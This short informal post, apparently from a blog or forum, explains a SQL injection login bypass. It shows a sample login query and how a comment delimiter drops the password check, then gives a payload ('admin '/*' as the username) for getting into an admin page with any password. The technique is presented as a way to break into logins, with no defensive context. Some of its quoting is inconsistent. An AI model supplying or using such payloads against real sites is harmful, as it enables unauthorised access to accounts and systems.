Sql injection is a common hacking techniques which is quiet easy to perform.By using some logical sql one can crack into a web login. the whole concept works one the principle of delimiters.
For example
if my sql for login is
select * from login_tbl where username='admin' and passsword='@#@#'
the query can be executed successfully by delimiting it to
select * from login_tbl where username='admin'/* and password=''@#@#'
(provided i know the username, that would need some guess work)
Now the practical implementation
in the login page type admin '/* as username
any password will do the trick
this give the same effect as..
select * from login_tbl where username='admin'/* and password=''@#@#'
which redilly takes me to the admin page..
